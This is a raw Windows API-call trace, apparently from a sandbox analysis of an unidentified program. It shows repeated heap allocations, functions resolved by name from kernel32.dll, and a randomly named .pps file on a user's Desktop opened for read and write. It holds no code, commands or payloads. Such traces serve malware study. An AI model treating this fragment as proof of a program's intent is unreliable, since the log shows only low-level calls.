[0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0158.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0158.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.583] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0158.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba378 [0158.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba378, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0158.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.584] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0158.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0158.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0158.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0158.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba378, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0158.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.585] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0158.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0158.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0158.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0158.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0158.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0158.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0158.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0158.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0158.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0158.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0158.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0158.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x33) returned 0x90ad98 [0158.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps", cchWideChar=51, lpMultiByteStr=0x90ad98, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps", lpUsedDefaultChar=0x0) returned 51 [0158.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0158.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0158.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0158.586] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dbszqxeh.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0158.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0158.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0158.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0158.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0158.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0158.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0158.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0158.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=51, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0158.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x66) returned 0x8e8320 [0158.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=51, lpWideCharStr=0x8e8320, cchWideChar=51 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.pps") returned 51 [0158.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0158.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0158.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0158.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0158.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0158.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0158.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0158.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0158.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0158.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0158.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0158.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0158.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0158.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0158.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0158.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0158.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0158.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0158.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0158.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0158.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0158.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0158.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0158.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0158.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0158.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0158.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0158.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.592] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0158.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0158.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0158.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0158.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0158.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0158.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0158.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0158.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.595] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0158.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0158.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0158.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0158.596] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0158.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0158.596] 